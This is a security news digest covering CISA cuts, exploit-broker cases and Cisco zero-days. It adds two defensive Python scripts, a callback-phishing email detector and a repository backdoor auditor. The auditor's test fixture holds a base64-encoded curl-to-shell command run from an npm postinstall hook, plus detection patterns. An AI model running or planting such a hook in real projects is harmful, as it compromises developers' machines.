ClearSignal — Feb 26, 2026
Top 3
- CISA has lost one-third of its workforce in the past year, creating a critical capacity gap at the federal agency responsible for defending U.S. critical infrastructure and coordinating cybersecurity response. With bipartisan concern over the agency’s ability to handle major cyber crises, this personnel crisis directly threatens national security readiness and should inform workforce planning and agency engagement strategies for any GovCon executive. — cyberscoop
- A former L3Harris defense contractor executive received over seven years in prison for stealing and selling zero-day exploits to Russian intelligence brokers, representing one of the most serious insider threat cases in recent defense contracting history. This case underscores the critical importance of insider risk programs, supply chain security, and the real consequences of inadequate security controls in the defense industrial base. — bleeping-computer
- Google disrupted a sophisticated Chinese state-sponsored espionage campaign that weaponized legitimate SaaS API calls to evade detection while targeting telecom firms and government agencies worldwide. This represents an evolution in adversary tradecraft that bypasses traditional security controls, requiring GovCon organizations to rethink their detection strategies and understand how nation-state actors are exploiting trusted cloud services. — bleeping-computer
Competitive Landscape
- Marquis Software Solutions filed a lawsuit against SonicWall alleging gross negligence and misrepresentation that resulted in a ransomware attack affecting operations at 74 U.S. banks. — bleeping-computer
Policy & Regulatory
- The U.S. Treasury Department sanctioned a Russian exploit broker who purchased stolen zero-day hacking tools from a former U.S. defense contractor executive. — bleeping-computer
- The former head of Trenchant, a specialized U.S. defense contractor unit under L3Harris, was sentenced to over seven years in prison for stealing and selling zero-day exploits to a Russian broker with Russian government clients. — bleeping-computer
- China’s top prosecutorial agency reported handling hundreds of domestic cases involving commercial espionage and technology theft since 2021. This signals increased Chinese government attention to internal intellectual property protection and technology leakage. — the-record
- Ukrainian President Volodymyr Zelenskyy announced that Ukrainian officials will meet with Trump administration envoys in Geneva, with U.S.-brokered talks between Ukraine and Russia expected next week. These diplomatic engagements could impact ongoing conflict dynamics. — defense-news
- PowerSchool and Chicago Public Schools agreed to a $17.25 million settlement for a student data privacy lawsuit affecting over 10 million class members, with PowerSchool also required to establish a web governance committee to monitor certain actions. — the-record
- The FTC issued a policy statement clarifying it will not enforce COPPA against website and online service providers who properly use age verification technologies to collect, use, and share personal data. — the-record
Agency & Mission Activity
- CISA has lost one-third of its workforce over the past year, with bipartisan lawmakers and industry stakeholders expressing concern that the agency is now unprepared to handle potential cybersecurity crises. The personnel cuts have significantly impacted the agency’s operational capacity. — cyberscoop
- CISA issued an emergency directive requiring federal agencies to immediately patch critical vulnerabilities in Cisco networking devices by Friday. — federal-news-network
- The U.S. Army is adapting its armored brigade tactics and formations based on lessons learned from Ukraine’s battlefield experience with tanks and heavy firepower, rethinking how units move and survive in modern combat. — defense-news
Technology Trends
- Zyxel released security patches for a critical remote code execution vulnerability affecting over a dozen router models that could allow unauthenticated attackers to compromise unpatched devices. — bleeping-computer
- A Moscow resident has been accused of impersonating a Russian FSB officer to extort money from the Conti ransomware gang, according to local media reports. — the-record
- VulnCheck research indicates that while the number of published vulnerabilities grew in 2025, only 1% were actually weaponized in attacks, suggesting defenders spend disproportionate effort on proof-of-concept exploits that never see real-world use. — cyberscoop
- OpenAI discovered that a Chinese law enforcement agency used ChatGPT to upload reports detailing a global digital surveillance and harassment operation targeting regime critics both domestically and internationally. This revelation exposes how adversaries are leveraging commercial AI tools for intelligence and influence operations. — cyberscoop
- This week’s incidents include low-skill actors compromising 600 Fortinet devices using AI-generated playbooks, Anthropic’s disclosure of Chinese AI-model theft, and a seven-year sentence for Peter Williams for selling L3Harris Trenchant exploits to Russia. Additional revelations show Ivanti was breached in 2021 through vulnerabilities in its own products. — risky-business
- Attackers are using telephone-oriented attack delivery (TOAD) to bypass email security gateways by including only phone numbers in email payloads rather than malicious links or attachments. This technique evades traditional email security controls that scan for malicious content. — dark-reading
- The OpenClaw vulnerability has generated significant discussion on Telegram and dark web forums, but Flare’s analysis indicates more research interest than actual mass exploitation. Supply-chain risks exist in skills marketplaces, but evidence of large-scale criminal operations remains limited. — bleeping-computer
- Massachusetts-based medical device manufacturer UFP Technologies reported a cyberattack in February that may have resulted in data theft or destruction, and has deployed backup data systems in response. The company disclosed the incident in a regulatory filing. — the-record
- Microsoft Defender team uncovered a coordinated campaign targeting software developers with malicious repositories disguised as legitimate Next.js projects and recruitment coding tests to deliver backdoors. — bleeping-computer
- Cisco disclosed CVE-2026-20127, a critical authentication bypass in Cisco Catalyst SD-WAN that has been exploited as a zero-day since 2023, allowing remote attackers to compromise controllers and add rogue peers. — bleeping-computer
- Google’s Threat Intelligence Group and Mandiant disrupted a Chinese state-sponsored espionage campaign that used SaaS API calls to conceal malicious traffic while targeting dozens of telecom firms and government agencies globally. — bleeping-computer
- DoD officials are advancing a proactive approach to operational technology (OT) security through zero trust architecture and risk operations centers in response to ongoing adversary targeting of critical U.S. infrastructure. — federal-news-network
- Discord has paused its global age verification policy following user backlash, with co-founder Stanislav Vishnevskiy acknowledging the company failed to clearly communicate the policy’s purpose and implementation. — the-record
- CISA issued an emergency directive warning that threat actors are actively exploiting Cisco SD-WAN vulnerabilities, posing significant risks to federal civilian executive branch networks. The warning was issued in coordination with Five Eyes intelligence allies. — the-record
- The law-enforcement seizure of the RAMP ransomware forum has disrupted the ransomware ecosystem; researchers advise defenders to monitor how threat groups reorganize and to use that intelligence for defensive planning. — dark-reading
- North Korean threat actors are deploying malicious Next.js repositories disguised as job opportunities to compromise developers and establish persistent access to target systems. — dark-reading
- CISA and Five Eyes partners issued warnings about a global campaign exploiting Cisco zero-day vulnerabilities in edge technology, with attacks dating back to 2023. This marks the second such series of actively exploited zero-days in Cisco edge devices since last spring. — cyberscoop
- Chinese police conducted politically motivated influence operations against Japanese Prime Minister Takaichi using ChatGPT, with operational details inadvertently leaked through a ChatGPT account. This reveals state-sponsored use of AI tools for disinformation campaigns. — dark-reading
- Security vulnerabilities discovered in Anthropic’s Claude AI code assistant expose developers’ machines to compromise and highlight the supply-chain risk of integrating AI tools into software development workflows. The flaws show that AI-assisted development tools add attack surface on the developer workstation that must be accounted for. — dark-reading
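The TOAD item above describes a lure that carries nothing a link- or attachment-scanning gateway would catch: the only call to action is a phone number. The following is an added example, not code from any of the cited sources, showing the complementary check a mail-security team can run on its own: flag messages that contain a phone number, no URL, no attachment, and two or more billing or callback lure words. The phone-number format (North American), the lure-word list, and the three sample messages are all constructed assumptions; extend the first two for your own mail corpus.

```python
import re
from email import message_from_string
from email.message import Message

# Pattern assumptions (not from the source): North American phone formats and a
# short list of callback-lure words; tune both against your own mail flow.
PHONE_RE = re.compile(r"(?:\+?1[\s.-]?)?\(?\b\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}\b")
URL_RE = re.compile(r"\b(?:https?://|www\.)\S+", re.IGNORECASE)
LURE_WORDS = ("call", "invoice", "subscription", "renew", "charged", "refund", "cancel", "payment")


def _body_text(msg: Message) -> str:
    """Concatenate the text parts of a message, skipping attachments."""
    chunks = []
    for part in msg.walk():  # walk() yields the message itself when it is not multipart
        if part.get_content_maintype() != "text" or part.get_filename():
            continue
        payload = part.get_payload(decode=True) or b""
        chunks.append(payload.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)


def _has_attachment(msg: Message) -> bool:
    return any(part.get_filename() for part in msg.walk())


def score_toad(raw: str) -> dict:
    """Flag a message whose only call to action is a phone number:
    no URL, no attachment, and at least two lure words in subject or body."""
    msg = message_from_string(raw)
    text = f"{msg.get('Subject', '')}\n{_body_text(msg)}"
    phones = sorted({m.group(0).strip() for m in PHONE_RE.finditer(text)})
    urls = URL_RE.findall(text)
    lowered = text.lower()
    lure_hits = [w for w in LURE_WORDS if w in lowered]
    attached = _has_attachment(msg)
    return {
        "subject": msg.get("Subject", ""),
        "phones": phones,
        "url_count": len(urls),
        "has_attachment": attached,
        "lure_words": lure_hits,
        "toad": bool(phones) and not urls and not attached and len(lure_hits) >= 2,
    }


def triage(messages) -> list:
    """Score a batch of raw RFC 822 messages."""
    return [score_toad(raw) for raw in messages]


# Constructed sample messages (not real mail). Headers must start in column 0.
SAMPLE_MESSAGES = [
# 1. TOAD lure: no link, no attachment, the phone number is the only action.
"""From: billing-noreply@example.net
To: user@example.com
Subject: Your subscription was renewed: $399.99 charged
Content-Type: text/plain; charset="utf-8"

Your annual subscription was renewed and your card will be charged $399.99.
To cancel or request a refund, call our billing desk at +1 (800) 555-0199
within 24 hours.
""",
# 2. Ordinary internal mail: has a link, a phone number in passing, one lure word.
"""From: dana@example.com
To: user@example.com
Subject: Q3 report posted
Content-Type: text/plain; charset="utf-8"

Hi, the Q3 report is posted at https://intranet.example.com/reports/q3
Call me at (415) 555-0100 if anything looks off.
""",
# 3. Invoice with an attachment: the gateway already scans the PDF, so not TOAD.
"""From: billing@example.net
To: user@example.com
Subject: Invoice 4471 attached
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Please find invoice 4471 attached. Call (212) 555-0123 with payment questions.
--b1
Content-Type: application/pdf; name="invoice-4471.pdf"
Content-Disposition: attachment; filename="invoice-4471.pdf"
Content-Transfer-Encoding: base64

JVBERi0xLjQK
--b1--
""",
]

if __name__ == "__main__":
    for result in triage(SAMPLE_MESSAGES):
        print(result["toad"], result["subject"], result["phones"], result["lure_words"])
```

Only the first sample is flagged; the second has a URL and a single lure word, the third carries an attachment that the existing gateway will inspect. In production the phone numbers it extracts are the useful artifact: feed them to a shared blocklist and to the help desk so that a call-back from a user can be matched to the originating message.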
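The two items above on malicious Next.js repositories (the Microsoft Defender campaign and the North Korean job-lure variant) do not say how the backdoor is executed. The following is an added example, not code from either source or from Microsoft, that implements the pre-clone triage a developer or AppSec team can run before `npm install` or `next dev` on any take-home or recruitment repository. It assumes the two common execution routes, npm lifecycle hooks and code that runs automatically at install or build time (such as `next.config.js`), and looks for shell execution, dynamic evaluation, long base64 blobs and raw-IP URLs; the regex heuristics, the in-memory repositories and the 192.0.2.10 address are constructed for illustration.

```python
import base64
import json
import re

# Heuristics (assumptions, not from the source): code that runs without the
# developer explicitly invoking it is where a backdoor in a take-home would sit.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
SUSPICIOUS_JS = {
    "shell-exec": re.compile(r"\bchild_process\b|\bexecSync\(|\bspawn\("),
    "dynamic-eval": re.compile(r"\beval\(|new Function\("),
    "base64-blob": re.compile(r"Buffer\.from\(\s*['\"][A-Za-z0-9+/=]{40,}['\"]\s*,\s*['\"]base64['\"]"),
    "raw-ip-url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}"),
}
CODE_EXT = (".js", ".mjs", ".cjs", ".ts")


def audit_repo(files: dict) -> list:
    """Return human-readable findings for a repository given as {path: content}.

    next.config.js and any file named by a lifecycle hook execute without the
    developer running them on purpose, so they are scanned like any other code.
    """
    findings = []
    pkg = files.get("package.json")
    if pkg:
        scripts = json.loads(pkg).get("scripts", {})
        for hook in LIFECYCLE_HOOKS:
            if hook in scripts:
                findings.append(f"package.json: '{hook}' runs on npm install: {scripts[hook]}")
    for path in sorted(files):
        if not path.endswith(CODE_EXT):
            continue
        for label, pattern in SUSPICIOUS_JS.items():
            if pattern.search(files[path]):
                findings.append(f"{path}: {label}")
    return findings


# Constructed payload for the sample: a curl-to-shell one-liner against a
# TEST-NET (documentation) address, base64-encoded so it survives a casual read.
_PAYLOAD = base64.b64encode(b"curl -s http://192.0.2.10/init.sh | sh").decode()

# Constructed "recruitment test" repository with a postinstall backdoor.
MALICIOUS_REPO = {
    "package.json": json.dumps({
        "name": "frontend-take-home",
        "scripts": {"dev": "next dev", "build": "next build",
                    "postinstall": "node scripts/setup.js"},
        "dependencies": {"next": "14.2.3", "react": "18.3.1"},
    }),
    "next.config.js": "module.exports = { reactStrictMode: true };\n",
    "scripts/setup.js": (
        'const { execSync } = require("child_process");\n'
        f'execSync(Buffer.from("{_PAYLOAD}", "base64").toString());\n'
    ),
}

# Constructed benign repository with the same name and dependencies.
CLEAN_REPO = {
    "package.json": json.dumps({
        "name": "frontend-take-home",
        "scripts": {"dev": "next dev", "build": "next build", "start": "next start"},
        "dependencies": {"next": "14.2.3", "react": "18.3.1"},
    }),
    "next.config.js": "module.exports = { reactStrictMode: true };\n",
    "pages/index.js": "export default function Home() { return <h1>Take-home</h1>; }\n",
}

if __name__ == "__main__":
    for name, repo in (("malicious", MALICIOUS_REPO), ("clean", CLEAN_REPO)):
        print(name, audit_repo(repo) or ["no findings"])
```

The point of the check is where the code runs, not what it looks like: a `postinstall` hook fires the moment the candidate runs `npm install`, before any test is opened. Run unknown repositories in a disposable container regardless of the result; this script only tells you what to read first, and `npm install --ignore-scripts` is the cheap way to keep the hooks from firing while you do.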